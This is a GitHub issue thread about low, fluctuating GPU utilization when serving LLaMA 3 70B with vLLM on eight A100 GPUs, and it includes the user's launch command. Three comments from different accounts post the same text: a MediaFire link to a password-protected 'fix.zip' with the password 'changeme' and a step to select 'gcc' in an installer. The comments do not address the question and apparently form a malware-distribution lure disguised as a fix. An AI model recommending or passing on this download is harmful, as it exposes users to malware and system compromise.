### ISSUE TITLE
[Doc]: Why does the GPU utilization fluctuate so much?

### ISSUE THREAD

**Issue by wanghia** [vllm-project/vllm#7857]
### 📚 The doc issue

I'm using 8 A100 GPUs with 40GB each to deploy LLaMA 3 70B. Under high concurrency, the average GPU utilization is only 50%. Here are my launch parameters.

'''CUDA_VISIBLE_DEVICES={gpu} RAY_memory_monitor_refresh_ms=0 \
    python3 -u -m vllm.entrypoints.api_server --trust-remote-code \
    --gpu-memory-utilization 0.98 \
    --dtype float16 \
    --enforce-eager \
    --swap-space 16 --disable-log-requests --host 0.0.0.0 --port {port} --max-num-seqs 512 -tp {tp} --max-model-len 8192\
    --model {model_path} '''

### Before submitting a new issue...

- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
